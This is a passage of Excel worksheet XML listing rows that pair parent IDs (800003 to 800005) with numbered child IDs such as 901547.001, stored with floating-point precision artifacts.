        <v>901205</v>
      </c>
    </row>
    <row r="221" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A221" s="6">
        <v>800003</v>
      </c>
      <c r="B221" s="3">
        <v>901205.00100000005</v>
      </c>
    </row>
    <row r="222" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A222" s="6">
        <v>800003</v>
      </c>
      <c r="B222" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="223" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A223" s="6">
        <v>800003</v>
      </c>
      <c r="B223" s="3">
        <v>901078.00100000005</v>
      </c>
    </row>
    <row r="224" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A224" s="6">
        <v>800003</v>
      </c>
      <c r="B224" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="225" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A225" s="6">
        <v>800003</v>
      </c>
      <c r="B225" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="226" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A226" s="6">
        <v>800003</v>
      </c>
      <c r="B226" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="227" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A227" s="3">
        <v>800004</v>
      </c>
      <c r="B227" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="228" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A228" s="3">
        <v>800004</v>
      </c>
      <c r="B228" s="3">
        <v>901548.00100000005</v>
      </c>
    </row>
    <row r="229" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A229" s="3">
        <v>800004</v>
      </c>
      <c r="B229" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="230" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A230" s="3">
        <v>800004</v>
      </c>
      <c r="B230" s="3">
        <v>901548.00300000003</v>
      </c>
    </row>
    <row r="231" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A231" s="3">
        <v>800004</v>
      </c>
      <c r="B231" s="3">
        <v>901548.00399999996</v>
      </c>
    </row>
    <row r="232" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A232" s="3">
        <v>800004</v>
      </c>
      <c r="B232" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="233" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A233" s="3">
        <v>800004</v>
      </c>
      <c r="B233" s="3">
        <v>901134.00100000005</v>
      </c>
    </row>
    <row r="234" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A234" s="3">
        <v>800004</v>
      </c>
      <c r="B234" s="3">
        <v>901134.00199999998</v>
      </c>
    </row>
    <row r="235" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A235" s="3">
        <v>800004</v>
      </c>
      <c r="B235" s="3">
        <v>901134.00300000003</v>
      </c>
    </row>
    <row r="236" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A236" s="3">
        <v>800004</v>
      </c>
      <c r="B236" s="3">
        <v>901134.00399999996</v>
      </c>
    </row>
    <row r="237" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A237" s="3">
        <v>800004</v>
      </c>
      <c r="B237" s="3">
        <v>901134.005</v>
      </c>
    </row>
    <row r="238" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A238" s="3">
        <v>800004</v>
      </c>
      <c r="B238" s="3">
        <v>901547</v>
      </c>
    </row>
    <row r="239" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A239" s="3">
        <v>800004</v>
      </c>
      <c r="B239" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="240" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A240" s="3">
        <v>800004</v>
      </c>
      <c r="B240" s="3">
        <v>901547.00199999998</v>
      </c>
    </row>
    <row r="241" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A241" s="3">
        <v>800004</v>
      </c>
      <c r="B241" s="3">
        <v>901547.00300000003</v>
      </c>
    </row>
    <row r="242" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A242" s="3">
        <v>800004</v>
      </c>
      <c r="B242" s="3">
        <v>901547.00399999996</v>
      </c>
    </row>
    <row r="243" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A243" s="3">
        <v>800004</v>
      </c>
      <c r="B243" s="3">
        <v>901547.005</v>
      </c>
    </row>
    <row r="244" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A244" s="3">
        <v>800004</v>
      </c>
      <c r="B244" s="3">
        <v>901547.00600000005</v>
      </c>
    </row>
    <row r="245" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A245" s="3">
        <v>800004</v>
      </c>
      <c r="B245" s="3">
        <v>901547.00699999998</v>
      </c>
    </row>
    <row r="246" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A246" s="3">
        <v>800004</v>
      </c>
      <c r="B246" s="3">
        <v>901547.00800000003</v>
      </c>
    </row>
    <row r="247" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A247" s="3">
        <v>800004</v>
      </c>
      <c r="B247" s="3">
        <v>901547.00899999996</v>
      </c>
    </row>
    <row r="248" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A248" s="3">
        <v>800004</v>
      </c>
      <c r="B248" s="3">
        <v>901547.01</v>
      </c>
    </row>
    <row r="249" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A249" s="3">
        <v>800004</v>
      </c>
      <c r="B249" s="3">
        <v>901547.01100000006</v>
      </c>
    </row>
    <row r="250" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A250" s="3">
        <v>800004</v>
      </c>
      <c r="B250" s="3">
        <v>901547.01199999999</v>
      </c>
    </row>
    <row r="251" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A251" s="3">
        <v>800004</v>
      </c>
      <c r="B251" s="3">
        <v>901547.01300000004</v>
      </c>
    </row>
    <row r="252" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A252" s="3">
        <v>800004</v>
      </c>
      <c r="B252" s="3">
        <v>901547.01399999997</v>
      </c>
    </row>
    <row r="253" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A253" s="3">
        <v>800004</v>
      </c>
      <c r="B253" s="3">
        <v>901547.01500000001</v>
      </c>
    </row>
    <row r="254" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A254" s="3">
        <v>800004</v>
      </c>
      <c r="B254" s="3">
        <v>901037</v>
      </c>
    </row>
    <row r="255" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A255" s="3">
        <v>800004</v>
      </c>
      <c r="B255" s="3">
        <v>901037.00100000005</v>
      </c>
    </row>
    <row r="256" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A256" s="3">
        <v>800004</v>
      </c>
      <c r="B256" s="3">
        <v>901037.00199999998</v>
      </c>
    </row>
    <row r="257" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A257" s="3">
        <v>800004</v>
      </c>
      <c r="B257" s="3">
        <v>901037.00300000003</v>
      </c>
    </row>
    <row r="258" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A258" s="3">
        <v>800004</v>
      </c>
      <c r="B258" s="3">
        <v>901037.00399999996</v>
      </c>
    </row>
    <row r="259" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A259" s="3">
        <v>800004</v>
      </c>
      <c r="B259" s="3">
        <v>901037.005</v>
      </c>
    </row>
    <row r="260" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A260" s="3">
        <v>800004</v>
      </c>
      <c r="B260" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="261" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A261" s="3">
        <v>800004</v>
      </c>
      <c r="B261" s="3">
        <v>901543.00100000005</v>
      </c>
    </row>
    <row r="262" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A262" s="3">
        <v>800004</v>
      </c>
      <c r="B262" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="263" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A263" s="3">
        <v>800004</v>
      </c>
      <c r="B263" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="264" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A264" s="3">
        <v>800004</v>
      </c>
      <c r="B264" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="265" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A265" s="3">
        <v>800004</v>
      </c>
      <c r="B265" s="3">
        <v>901484</v>
      </c>
    </row>
    <row r="266" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A266" s="3">
        <v>800004</v>
      </c>
      <c r="B266" s="3">
        <v>901484.00100000005</v>
      </c>
    </row>
    <row r="267" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A267" s="3">
        <v>800004</v>
      </c>
      <c r="B267" s="3">
        <v>901484.00199999998</v>
      </c>
    </row>
    <row r="268" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A268" s="3">
        <v>800004</v>
      </c>
      <c r="B268" s="3">
        <v>901611</v>
      </c>
    </row>
    <row r="269" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A269" s="3">
        <v>800004</v>
      </c>
      <c r="B269" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="270" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A270" s="3">
        <v>800004</v>
      </c>
      <c r="B270" s="3">
        <v>901546.00100000005</v>
      </c>
    </row>
    <row r="271" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A271" s="3">
        <v>800004</v>
      </c>
      <c r="B271" s="3">
        <v>901546.00199999998</v>
      </c>
    </row>
    <row r="272" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A272" s="3">
        <v>800004</v>
      </c>
      <c r="B272" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="273" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A273" s="3">
        <v>800004</v>
      </c>
      <c r="B273" s="3">
        <v>901546.00399999996</v>
      </c>
    </row>
    <row r="274" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A274" s="3">
        <v>800004</v>
      </c>
      <c r="B274" s="3">
        <v>901546.005</v>
      </c>
    </row>
    <row r="275" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A275" s="3">
        <v>800004</v>
      </c>
      <c r="B275" s="3">
        <v>901546.00600000005</v>
      </c>
    </row>
    <row r="276" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A276" s="3">
        <v>800004</v>
      </c>
      <c r="B276" s="3">
        <v>901546.00699999998</v>
      </c>
    </row>
    <row r="277" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A277" s="3">
        <v>800004</v>
      </c>
      <c r="B277" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="278" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A278" s="3">
        <v>800004</v>
      </c>
      <c r="B278" s="3">
        <v>901546.00899999996</v>
      </c>
    </row>
    <row r="279" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A279" s="3">
        <v>800004</v>
      </c>
      <c r="B279" s="3">
        <v>901546.01</v>
      </c>
    </row>
    <row r="280" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A280" s="3">
        <v>800004</v>
      </c>
      <c r="B280" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="281" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A281" s="3">
        <v>800004</v>
      </c>
      <c r="B281" s="3">
        <v>901546.01199999999</v>
      </c>
    </row>
    <row r="282" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A282" s="3">
        <v>800004</v>
      </c>
      <c r="B282" s="3">
        <v>901546.01300000004</v>
      </c>
    </row>
    <row r="283" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A283" s="3">
        <v>800004</v>
      </c>
      <c r="B283" s="3">
        <v>901546.01399999997</v>
      </c>
    </row>
    <row r="284" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A284" s="3">
        <v>800004</v>
      </c>
      <c r="B284" s="3">
        <v>901546.01500000001</v>
      </c>
    </row>
    <row r="285" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A285" s="3">
        <v>800004</v>
      </c>
      <c r="B285" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="286" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A286" s="3">
        <v>800004</v>
      </c>
      <c r="B286" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="287" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A287" s="3">
        <v>800004</v>
      </c>
      <c r="B287" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="288" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A288" s="3">
        <v>800004</v>
      </c>
      <c r="B288" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="289" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A289" s="3">
        <v>800004</v>
      </c>
      <c r="B289" s="3">
        <v>901574.00399999996</v>
      </c>
    </row>
    <row r="290" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A290" s="3">
        <v>800004</v>
      </c>
      <c r="B290" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="291" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A291" s="3">
        <v>800004</v>
      </c>
      <c r="B291" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="292" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A292" s="3">
        <v>800004</v>
      </c>
      <c r="B292" s="3">
        <v>901574.00699999998</v>
      </c>
    </row>
    <row r="293" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A293" s="3">
        <v>800004</v>
      </c>
      <c r="B293" s="3">
        <v>901574.00800000003</v>
      </c>
    </row>
    <row r="294" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A294" s="3">
        <v>800004</v>
      </c>
      <c r="B294" s="3">
        <v>901574.00899999996</v>
      </c>
    </row>
    <row r="295" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A295" s="3">
        <v>800004</v>
      </c>
      <c r="B295" s="3">
        <v>901574.01</v>
      </c>
    </row>
    <row r="296" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A296" s="3">
        <v>800004</v>
      </c>
      <c r="B296" s="3">
        <v>901574.01100000006</v>
      </c>
    </row>
    <row r="297" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A297" s="3">
        <v>800004</v>
      </c>
      <c r="B297" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="298" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A298" s="3">
        <v>800004</v>
      </c>
      <c r="B298" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="299" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A299" s="3">
        <v>800004</v>
      </c>
      <c r="B299" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="300" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A300" s="3">
        <v>800004</v>
      </c>
      <c r="B300" s="3">
        <v>901055.00199999998</v>
      </c>
    </row>
    <row r="301" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A301" s="3">
        <v>800004</v>
      </c>
      <c r="B301" s="3">
        <v>901055.00300000003</v>
      </c>
    </row>
    <row r="302" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A302" s="3">
        <v>800004</v>
      </c>
      <c r="B302" s="3">
        <v>901055.00399999996</v>
      </c>
    </row>
    <row r="303" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A303" s="3">
        <v>800004</v>
      </c>
      <c r="B303" s="3">
        <v>901055.005</v>
      </c>
    </row>
    <row r="304" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A304" s="3">
        <v>800004</v>
      </c>
      <c r="B304" s="3">
        <v>901055.00800000003</v>
      </c>
    </row>
    <row r="305" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A305" s="3">
        <v>800004</v>
      </c>
      <c r="B305" s="3">
        <v>901055.00899999996</v>
      </c>
    </row>
    <row r="306" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A306" s="3">
        <v>800004</v>
      </c>
      <c r="B306" s="3">
        <v>901055.01100000006</v>
      </c>
    </row>
    <row r="307" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A307" s="3">
        <v>800004</v>
      </c>
      <c r="B307" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="308" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A308" s="3">
        <v>800004</v>
      </c>
      <c r="B308" s="3">
        <v>901055.01300000004</v>
      </c>
    </row>
    <row r="309" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A309" s="3">
        <v>800004</v>
      </c>
      <c r="B309" s="3">
        <v>901055.01399999997</v>
      </c>
    </row>
    <row r="310" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A310" s="3">
        <v>800004</v>
      </c>
      <c r="B310" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="311" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A311" s="3">
        <v>800004</v>
      </c>
      <c r="B311" s="3">
        <v>901053.00100000005</v>
      </c>
    </row>
    <row r="312" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A312" s="3">
        <v>800004</v>
      </c>
      <c r="B312" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="313" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A313" s="3">
        <v>800004</v>
      </c>
      <c r="B313" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="314" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A314" s="3">
        <v>800004</v>
      </c>
      <c r="B314" s="3">
        <v>901053.00399999996</v>
      </c>
    </row>
    <row r="315" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A315" s="3">
        <v>800004</v>
      </c>
      <c r="B315" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="316" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A316" s="3">
        <v>800004</v>
      </c>
      <c r="B316" s="3">
        <v>901053.00600000005</v>
      </c>
    </row>
    <row r="317" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A317" s="3">
        <v>800004</v>
      </c>
      <c r="B317" s="3">
        <v>901053.00699999998</v>
      </c>
    </row>
    <row r="318" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A318" s="3">
        <v>800004</v>
      </c>
      <c r="B318" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="319" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A319" s="3">
        <v>800004</v>
      </c>
      <c r="B319" s="3">
        <v>901078.00100000005</v>
      </c>
    </row>
    <row r="320" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A320" s="3">
        <v>800004</v>
      </c>
      <c r="B320" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="321" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A321" s="3">
        <v>800004</v>
      </c>
      <c r="B321" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="322" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A322" s="3">
        <v>800004</v>
      </c>
      <c r="B322" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="323" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A323" s="3">
        <v>800005</v>
      </c>
      <c r="B323" s="3">
        <v>901548</v>
      </c>
    </row>
    <row r="324" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A324" s="3">
        <v>800005</v>
      </c>
      <c r="B324" s="3">
        <v>901548.00100000005</v>
      </c>
    </row>
    <row r="325" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A325" s="3">
        <v>800005</v>
      </c>
      <c r="B325" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="326" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A326" s="3">
        <v>800005</v>
      </c>
      <c r="B326" s="3">
        <v>901548.00300000003</v>
      </c>
    </row>
    <row r="327" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A327" s="3">
        <v>800005</v>
      </c>
      <c r="B327" s="3">
        <v>901548.00399999996</v>
      </c>
    </row>
    <row r="328" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A328" s="3">
        <v>800005</v>
      </c>
      <c r="B328" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="329" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A329" s="3">
        <v>800005</v>
      </c>
      <c r="B329" s="3">
        <v>901134.00100000005</v>
      </c>
    </row>
    <row r="330" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A330" s="3">
        <v>800005</v>
      </c>
      <c r="B330" s="3">
        <v>901134.00199999998</v>
      </c>
    </row>
    <row r="331" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A331" s="3">
        <v>800005</v>
      </c>
      <c r="B331" s="3">
        <v>901134.00300000003</v>
      </c>
    </row>
    <row r="332" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A332" s="3">
        <v>800005</v>
      </c>
      <c r="B332" s="3">
        <v>901134.00399999996</v>
      </c>
    </row>
    <row r="333" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A333" s="3">
        <v>800005</v>
      </c>
      <c r="B333" s="3">
        <v>901134.005</v>
      </c>
    </row>
    <row r="334" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A334" s="3">
        <v>800005</v>
      </c>
      <c r="B334" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="335" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A335" s="3">
        <v>800005</v>
      </c>
      <c r="B335" s="3">
        <v>901612</v>
      </c>
    </row>
    <row r="336" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A336" s="3">
        <v>800005</v>
      </c>
      <c r="B336" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="337" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A337" s="3">
        <v>800005</v>
      </c>
      <c r="B337" s="3">
        <v>901610</v>
      </c>
    </row>
    <row r="338" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A338" s="3">
        <v>800005</v>
      </c>
      <c r="B338" s="3">
        <v>901006</v>
      </c>
    </row>
    <row r="339" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A339" s="3">
        <v>800005</v>
      </c>
      <c r="B339" s="3">
        <v>901484</v>
      </c>
    </row>
    <row r="340" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A340" s="3">
        <v>800005</v>
      </c>
      <c r="B340" s="3">
        <v>901484.00100000005</v>
      </c>
    </row>
    <row r="341" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A341" s="3">
        <v>800005</v>
      </c>
      <c r="B341" s="3">
        <v>901484.00199999998</v>
      </c>
    </row>
    <row r="342" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A342" s="3">
        <v>800005</v>
      </c>
      <c r="B342" s="3">
        <v>901480</v>
      </c>
    </row>
    <row r="343" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A343" s="3">
        <v>800005</v>
      </c>
      <c r="B343" s="3">
        <v>901480.00100000005</v>
      </c>
    </row>
    <row r="344" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A344" s="3">
        <v>800005</v>
      </c>
      <c r="B344" s="3">
        <v>901211</v>
      </c>
    </row>
    <row r="345" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A345" s="3">
        <v>800005</v>
      </c>
      <c r="B345" s="3">
        <v>901222</v>
      </c>
    </row>
    <row r="346" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A346" s="3">
        <v>800005</v>
      </c>
      <c r="B346" s="3">
        <v>901222.00100000005</v>
      </c>
    </row>
    <row r="347" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A347" s="3">
        <v>800005</v>
      </c>
      <c r="B347" s="3">
        <v>901222.00199999998</v>
      </c>
    </row>
    <row r="348" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A348" s="3">
        <v>800005</v>
      </c>
      <c r="B348" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="349" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A349" s="3">
        <v>800005</v>
      </c>
      <c r="B349" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="350" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A350" s="3">
        <v>800005</v>
      </c>
      <c r="B350" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="351" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A351" s="3">
        <v>800005</v>
      </c>
      <c r="B351" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="352" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A352" s="3">
        <v>800005</v>
      </c>
      <c r="B352" s="3">
        <v>901564.00399999996</v>
      </c>
    </row>
    <row r="353" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A353" s="3">
        <v>800005</v>
      </c>
      <c r="B353" s="3">
        <v>901564.005</v>
      </c>
    </row>
    <row r="354" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A354" s="3">
        <v>800005</v>
      </c>
      <c r="B354" s="3">
        <v>901564.00600000005</v>
      </c>
    </row>
    <row r="355" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A355" s="3">
        <v>800005</v>
      </c>
      <c r="B355" s="3">
        <v>901564.00699999998</v>
      </c>
    </row>
    <row r="356" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A356" s="3">
        <v>800005</v>
      </c>
      <c r="B356" s="3">
        <v>901564.00800000003</v>
      </c>
    </row>
    <row r="357" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A357" s="3">
        <v>800005</v>
      </c>
      <c r="B357" s="3">
        <v>901564.00899999996</v>
      </c>
    </row>
    <row r="358" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A358" s="3">
        <v>800005</v>
      </c>
      <c r="B358" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="359" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A359" s="3">
        <v>800005</v>
      </c>
      <c r="B359" s="3">
        <v>901574.00100000005</v>
      </c>
    </row>
    <row r="360" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A360" s="3">
        <v>800005</v>
      </c>
      <c r="B360" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="361" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A361" s="3">
        <v>800005</v>
      </c>
      <c r="B361" s="3">
        <v>901574.00399999996</v>
      </c>
    </row>
    <row r="362" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A362" s="3">
        <v>800005</v>
      </c>
      <c r="B362" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="363" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A363" s="3">
        <v>800005</v>
      </c>
      <c r="B363" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="364" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A364" s="3">
        <v>800005</v>
      </c>
      <c r="B364" s="3">
        <v>901574.00699999998</v>
      </c>
    </row>
    <row r="365" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A365" s="3">
        <v>800005</v>
      </c>
      <c r="B365" s="3">
        <v>901574.00800000003</v>
      </c>
    </row>
    <row r="366" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A366" s="3">
        <v>800005</v>
      </c>
      <c r="B366" s="3">
        <v>901574.00899999996</v>
      </c>
    </row>
    <row r="367" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A367" s="3">
        <v>800005</v>
      </c>
      <c r="B367" s="3">
        <v>901574.01</v>
      </c>
    </row>
    <row r="368" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A368" s="3">
        <v>800005</v>
      </c>
      <c r="B368" s="3">
        <v>901574.01100000006</v>
      </c>
    </row>
    <row r="369" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A369" s="3">
        <v>800005</v>
      </c>
      <c r="B369" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="370" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A370" s="3">
        <v>800005</v>
      </c>
      <c r="B370" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="371" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A371" s="3">
        <v>800005</v>
      </c>
      <c r="B371" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="372" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A372" s="3">
        <v>800005</v>
      </c>
      <c r="B372" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="373" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A373" s="3">
        <v>800005</v>
      </c>
      <c r="B373" s="3">
        <v>901562.00300000003</v>
      </c>
    </row>
    <row r="374" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A374" s="3">
        <v>800005</v>
      </c>
      <c r="B374" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="375" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A375" s="3">
        <v>800005</v>
      </c>
      <c r="B375" s="3">
        <v>901562.00600000005</v>
      </c>
    </row>
    <row r="376" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A376" s="3">
        <v>800005</v>
      </c>
      <c r="B376" s="3">
        <v>901562.00699999998</v>
      </c>
    </row>
    <row r="377" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A377" s="3">
        <v>800005</v>
      </c>
      <c r="B377" s="3">
        <v>901562.00800000003</v>
      </c>
    </row>
    <row r="378" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A378" s="3">
        <v>800005</v>
      </c>
      <c r="B378" s="3">
        <v>901562.00899999996</v>
